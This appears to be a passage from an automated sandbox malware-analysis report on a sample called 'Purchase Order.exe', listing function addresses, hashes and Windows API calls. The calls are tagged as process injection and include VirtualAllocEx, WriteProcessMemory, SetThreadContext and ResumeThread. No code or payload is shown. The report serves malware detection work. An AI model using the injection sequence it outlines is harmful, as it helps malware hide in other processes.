String ID:
API String ID: 4139908857-0
Opcode ID: bc17ddcb4cd8b8ecc79c40ce0b502573e67578ac57a4d85f52423dd992de2c20
Instruction ID: a797940168d80ba3d567e048079b2963630b5f557083802ac782d955bf02f927
Opcode Fuzzy Hash: bc17ddcb4cd8b8ecc79c40ce0b502573e67578ac57a4d85f52423dd992de2c20
Instruction Fuzzy Hash: 0D818770A00B158FDB24DF29D45479ABBF1FF88304F00892EE49ACBA50DB74E959CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C2590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C259C9

Memory Dump Source

Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c596de0ca8e63372af7cc4ece48e4c094f07e37bfa92ddea5a02cfdb07188ca2
Instruction ID: 5c094010105233faa47b81221b0ed1006d2ac8a60fbb83d3856f41658a68938f
Opcode Fuzzy Hash: c596de0ca8e63372af7cc4ece48e4c094f07e37bfa92ddea5a02cfdb07188ca2
Instruction Fuzzy Hash: 0941F4B0C00719CFDB24DFA9C8857DEBBB5BF49304F20816AD408AB251DB75694ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C244B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C259C9

Memory Dump Source

Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 48caee8f64ff154819685208b446f8f07c8e50658b0f0c575cdfafd2189bbaff
Instruction ID: cac501d0d19c4ddf1abf02ad73510cbe8d102f8960177b97e0939e8c4e2601d3
Opcode Fuzzy Hash: 48caee8f64ff154819685208b446f8f07c8e50658b0f0c575cdfafd2189bbaff
Instruction Fuzzy Hash: F641E2B0C00729CBDB24DFA9C884A9EBBF5BF49304F20805AD409AB251DB716945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06D64000 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D64098

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9106e54648eb3fe6ab44a952e7696d1bf2675b69769841c73fb7c3ff42c969fe
Instruction ID: 4fb687754d926deedd9622bda6726c4bbdde703367bf9fdd5b23613cf93e3d82
Opcode Fuzzy Hash: 9106e54648eb3fe6ab44a952e7696d1bf2675b69769841c73fb7c3ff42c969fe
Instruction Fuzzy Hash: 7E2169B1D003199FCB10CFAAC885BDEBBF5FF88310F10842AE919A7240D7789941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D64008 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D64098

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6c4292168beb9b0f58a67ca29984e8d258d9c43c70fac419baa13698667f91b5
Instruction ID: 3e108d12cd689a615d1926b274886fb0196e2fc196135f9b2ed252ea2b924620
Opcode Fuzzy Hash: 6c4292168beb9b0f58a67ca29984e8d258d9c43c70fac419baa13698667f91b5
Instruction Fuzzy Hash: A42136B1D003599FCB10CFAAC885BDEBBF5FF88310F10842AE919A7240D7789945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D640F1 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D64178

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ed66f1127bda5dd952b112201a3b0b826414f436555c6455e7dce18a410c3f8f
Instruction ID: 161c814fc5f0f12959fa1604bc4900a6ca87b195a28c585321b74368c71eb8d4
Opcode Fuzzy Hash: ed66f1127bda5dd952b112201a3b0b826414f436555c6455e7dce18a410c3f8f
Instruction Fuzzy Hash: E32136B1D003499FCB10CFAAC845ADEBBF5FF48310F10842AE919A7240C7389945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D63E6A Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D63EEE

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 49a98a34d9f6e32ace772ce6b13f6ba0e7542e20ce1aec69c01a285f06a23fcc
Instruction ID: c09295fa97f3ca55d8ea8d0a4267be8e8b151b4ed1717618a826d25f34e16782
Opcode Fuzzy Hash: 49a98a34d9f6e32ace772ce6b13f6ba0e7542e20ce1aec69c01a285f06a23fcc
Instruction Fuzzy Hash: BF211A71D003099FDB10DFAAC4857EEBBF5EF88314F148429E819A7241D7789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06D63E70 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D63EEE

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3dc582d69660aa18eb68826f859ae8954d09fb17c2326636db86ba96ad760a80
Instruction ID: 1339fdf9b809cbbbc5f3382e2d805fd497246a5609848a92f57e651f86f6f6a8
Opcode Fuzzy Hash: 3dc582d69660aa18eb68826f859ae8954d09fb17c2326636db86ba96ad760a80
Instruction Fuzzy Hash: AE211871D003098FDB10DFAAC4857EEBBF4EF88324F14842AD419A7241D7789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06D640F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D64178

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 759128db9e7e810cd8965e221c03b829d905584de1e8fd174112499026c45305
Instruction ID: a3e1eca0c5fb31e3b470417e7b8ef11b090e2eff4f4d37306b5c48a90b68dbab
Opcode Fuzzy Hash: 759128db9e7e810cd8965e221c03b829d905584de1e8fd174112499026c45305
Instruction Fuzzy Hash: 87213AB1C003499FCB10DFAAC845ADEFBF5FF48310F10842AE519A7240C7389551DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C2D920 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C2D9A7

Memory Dump Source

Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3292382bc73b80c788ac1ce3368d191bef410b20004dce486b9df4a31ce340da
Instruction ID: 8c4b2d14e563c341d428248455575c38accd7015ce90b15e64515c6ac8301fa3
Opcode Fuzzy Hash: 3292382bc73b80c788ac1ce3368d191bef410b20004dce486b9df4a31ce340da
Instruction Fuzzy Hash: 5A21E4B5D003099FDB10DF9AD984ADEBBF8FB48310F14801AE919A3310D374A944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 06D63F40 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D63FB6

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 07abf045b07f6764d3f74ef35261653d475d15f5b0533bbed5d93b900db176b9
Instruction ID: be0bf9e45b8f75aa25c09a1c18d593ca056847c207b137f469a5933bd4f29724
Opcode Fuzzy Hash: 07abf045b07f6764d3f74ef35261653d475d15f5b0533bbed5d93b900db176b9
Instruction Fuzzy Hash: 121156B2C002499FCB10DFAAC845ADFBFF5EB89324F208419E919A7250C735A941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A408 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C2B319,00000800,00000000,00000000), ref: 00C2B52A

Memory Dump Source

Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a9b0fab911bb68fd38b39607b7e5603b8554427365ba54df7d4b3053e5306d0e
Instruction ID: 4a8cd2e9361b48e376c2e3970a0012a7d53a23637fb565692d9c920c65276b86
Opcode Fuzzy Hash: a9b0fab911bb68fd38b39607b7e5603b8554427365ba54df7d4b3053e5306d0e
Instruction Fuzzy Hash: 951114B6C003098FCB10CF9AD444ADEFBF4EB48310F10842AE919A7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B4B8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C2B319,00000800,00000000,00000000), ref: 00C2B52A

Memory Dump Source

Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b56523bcf9cd815e23dd4e2ef6dc556b74d4fa2cc22aedda72d32cfdbfa853e1
Instruction ID: 62d6692173af570badda95f63c86bf5d734748f8cffbd62a421ec28edca8b8f3
Opcode Fuzzy Hash: b56523bcf9cd815e23dd4e2ef6dc556b74d4fa2cc22aedda72d32cfdbfa853e1
Instruction Fuzzy Hash: 8E1114B6C003499FDB10CFAAD844ADEFBF4EB48310F14842ED429AB601C379A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06D63F48 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D63FB6

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c3f47f6f179912149b1811064fa02940a32619e979d9d50c8366e17d6e766d85
Instruction ID: f4a819cc9c0325d772b7a940695914962bcb6db762a66abfa72f64529012910c
Opcode Fuzzy Hash: c3f47f6f179912149b1811064fa02940a32619e979d9d50c8366e17d6e766d85
Instruction Fuzzy Hash: F21123B2D002499FCB10DFAAC845ADFBFF5EB88324F20841AE519A7250C775A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D63DB8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06D63E22

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cb9bc07020511934fc3a784d4680766a0b780287dc9ebee1fc018987c690cbf7
Instruction ID: 940213e772861b449cfa71a6186ce3d46baf8ebe54f739e6cec7a98f6199af51
Opcode Fuzzy Hash: cb9bc07020511934fc3a784d4680766a0b780287dc9ebee1fc018987c690cbf7
Instruction Fuzzy Hash: 8E1158B1D003498FCB20DFAAC8457DFFBF4EB88324F20841AD419A7240CB396945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D684F8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 06D68558

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b495a9968d712029cdb1654e4fb50f279b054af1c93fce1f024bdce75a2cf130
Instruction ID: cadfa156691e222595384b660b83d765f275a519eca7c472805fc2ee1a6fb6af
Opcode Fuzzy Hash: b495a9968d712029cdb1654e4fb50f279b054af1c93fce1f024bdce75a2cf130
Instruction Fuzzy Hash: D91106B5C003499FCB10DF9AD945BEEBBF4EB48320F20845AE959A7340D738A544CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 06D63DC0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06D63E22

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: baf8304e9de1432296de0e2d6bcf78dd0d414e0036d5d47a24c8da16dbb1cb5d
Instruction ID: 22da1cb22d0f2303dd9c7c89db7b769b8119d0f6b7bf82d0620701a8c477c7ee
Opcode Fuzzy Hash: baf8304e9de1432296de0e2d6bcf78dd0d414e0036d5d47a24c8da16dbb1cb5d
Instruction Fuzzy Hash: A91125B1D003498FDB20DFAAC8457DEFBF4EB88324F20841AD419A7240CB79A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B238 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C2B29E

Memory Dump Source

Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e4269c517ab24382e865f373ca7af92c9815e2347f2d3759d186002530e4248c
Instruction ID: 5360a73da2afb1abd154b9efbfafc71d5f6bfb11c0180bf93795e8f02642504e
Opcode Fuzzy Hash: e4269c517ab24382e865f373ca7af92c9815e2347f2d3759d186002530e4248c
Instruction Fuzzy Hash: A811E0B6C0035ACFCB10CF9AD444ADEFBF4EB88314F15841AD829A7610D379A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D68500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 06D68558

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 7cf41ede5140c86093dd61a66f4bfe41e16c900640bee531d6155b4cfb4870d7
Instruction ID: 861aae6d76d6c2e9ae9aa2f7b1bd797a1cef3e9491aa677336d36822cd213e9d
Opcode Fuzzy Hash: 7cf41ede5140c86093dd61a66f4bfe41e16c900640bee531d6155b4cfb4870d7
Instruction Fuzzy Hash: 9E1103B5C003498FCB10DF9AC545BEEBBF4EB48320F20841AE969A7340D338A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06D66240 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D669ED

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6e974ae09c17b74ffdf6c166c7366cc0619af752a7d42544469ceecd1cb08443
Instruction ID: d4e29609007ed9c3e65be88b525340d9b1a0c368ef4e439360c5a510f576dc12
Opcode Fuzzy Hash: 6e974ae09c17b74ffdf6c166c7366cc0619af752a7d42544469ceecd1cb08443
Instruction Fuzzy Hash: C91103B5C003499FDB10DF9AD849BDEFBF8EB48314F10841AE958A7200D375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D66988 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D669ED

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d2eb5aa8337ceecc092348363f6a962dc9c42205d32ab5190ee8fafb0dc64c6d
Instruction ID: 74e15e3e2e6b978079788da3c2b076fc5b3ca16b6d1bb70d7b56102465855f49
Opcode Fuzzy Hash: d2eb5aa8337ceecc092348363f6a962dc9c42205d32ab5190ee8fafb0dc64c6d
Instruction Fuzzy Hash: F311F2B58002498FCB10CF9AD945BDEBBF4EB48324F24840AE559A7310C375AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0087D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013209170.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_87d000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbce03d78a9017e4eda5d28d4aa3da584999caa7e97870bcdcae8e6806ecccb8
Instruction ID: 8a3f3944957736b9f80cdd2118f39e0546ef9e3fae580164c07f2a2f0c63a066
Opcode Fuzzy Hash: dbce03d78a9017e4eda5d28d4aa3da584999caa7e97870bcdcae8e6806ecccb8
Instruction Fuzzy Hash: 5421E2B1504304DFDB05DF14D9C0B16BB75FB94324F24C569D9098A25AC336E856C6A5

Uniqueness

Uniqueness Score: -1.00%

Function 0088D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013257256.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88d000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b512b1fa26ba9275f04c2bae9ba02c61c52d7e93a997cc8a6759c898487d9e74
Instruction ID: 71ff9f1f1ad527e52c22f1dbabbee7826eddf1cc91e02e9a9f3d69b45117da78
Opcode Fuzzy Hash: b512b1fa26ba9275f04c2bae9ba02c61c52d7e93a997cc8a6759c898487d9e74
Instruction Fuzzy Hash: F021D0B1604744EFDB14EF14D984B26BBA5FB84318F24C569D84A8B286C33AD807CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0087D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013209170.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_87d000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction ID: 3df27da437c3c81e4d1148b57db7573cabb574b983e65ee123a1f241c68cfdd7
Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction Fuzzy Hash: 4A11DF72404340DFCB02CF00D5C4B16BF71FB94324F24C2A9D8094B65AC33AE85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0088D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013257256.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88d000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: e8e1df2c2bff65d40e0f961b9aa55fb45bfc3cc203508f0e2c69ffbd80e26316
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: 7811DD75504780CFDB11DF14D5C4B15FBA2FB84314F24C6AAD8498B696C33AD80BCBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 06D61680 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

$$ll, xrefs: 06D616DB

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID:
String ID: $$ll
API String ID: 0-3155951761
Opcode ID: 1535d2ef235909c575a1eaa12f68ed9ced7f471c49ae90c1fff2041e86b3edfa
Instruction ID: d6291c29f52d2f5573ce6cb953ddfe5ab73eb281e5ab9de0075aa36ba4824b50
Opcode Fuzzy Hash: 1535d2ef235909c575a1eaa12f68ed9ced7f471c49ae90c1fff2041e86b3edfa
Instruction Fuzzy Hash: 55E10874E101598FDB14DFA9C9809AEBBF2FF89304F24C169E418AB355D730A942CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D63598 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36587f56eaad4f00eb4ad10fe1c83d71e6c86f734066a479981516adee03b25
Instruction ID: 4cf4e32068b4c02c810fcd7dc86583272a8d6b853f0afa0d20771c7bd60247e9
Opcode Fuzzy Hash: a36587f56eaad4f00eb4ad10fe1c83d71e6c86f734066a479981516adee03b25
Instruction Fuzzy Hash: 6FE10874E001598FDB14DFA9C5809AEBBF2FF89304F249169E458AB355DB30A942CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D61AB8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f065b59becdd250c1327804b9116842ac1cd449393b0b59ea67b30ac1c28058e
Instruction ID: 59d4b01a18f4c019f292a426a47f6cc18901be57e43c3a7ad91069dbd16c1059
Opcode Fuzzy Hash: f065b59becdd250c1327804b9116842ac1cd449393b0b59ea67b30ac1c28058e
Instruction Fuzzy Hash: 0BE1E974E001598FDB14DFA9C9809AEFBF2FF89304F248169E459A7356D730A942CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D61248 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8e722b12c5e84a8e91cd57a882e3583583e40cb034a01d8d20306ce4db4e8d
Instruction ID: d4b68b39998f479eaf237bb0d648dd0145a3813913eafc43e655e5842d178a69
Opcode Fuzzy Hash: fa8e722b12c5e84a8e91cd57a882e3583583e40cb034a01d8d20306ce4db4e8d
Instruction Fuzzy Hash: 63E1F874E001598FDB14DFA9C9809AEFBF2FF89304F248169E459AB355D730A942CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D63160 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ac489614ce80f148594930207a9a39381da3f1adf0c8611e7ce949939357a9
Instruction ID: 7ace68e458d3b150512bace5f43edc21eed9aa86a0fcd45217238932ee76e029
Opcode Fuzzy Hash: 69ac489614ce80f148594930207a9a39381da3f1adf0c8611e7ce949939357a9
Instruction Fuzzy Hash: 9BE10774E002598FDB14DFA9C5809AEFBF2FF89304F249169E458AB315DB31A942CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C2D604 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bdc82f49558b7ce3173446b09c7f43eb64c2d0d407a94a563da9cfe6482304b
Instruction ID: ec6f0065bee25653ca0e454063f174ef0f4db2d78df46ec0031b6212d9a2d821
Opcode Fuzzy Hash: 9bdc82f49558b7ce3173446b09c7f43eb64c2d0d407a94a563da9cfe6482304b
Instruction Fuzzy Hash: 77A16D36E00229CFCF05DFA4D94059EBBB2FF85300B25857EE815AB261DB71E956DB80

Uniqueness

Uniqueness Score: -1.00%

Function 06D63588 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e32f04bf0767c8afb8bdd7f04be180c7689c8be3129c88b670d4e55a8de79cbc
Instruction ID: 7991f6b45e704abd4c6e5891b09eb647e2d7dc4b93243ae3c88f47d6ef1ff183
Opcode Fuzzy Hash: e32f04bf0767c8afb8bdd7f04be180c7689c8be3129c88b670d4e55a8de79cbc
Instruction Fuzzy Hash: E8510C74E012598BDB14DFAAC5805AEFBF2FF89304F24D16AD458A7315DB30A942CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Purchase Order.exePID: 3304, Parent PID: 5304COMMON

Executed Functions

Function 0152C7B2 Relevance: 7.7, Strings: 6, Instructions: 184COMMON

Download Yara Rule

Strings

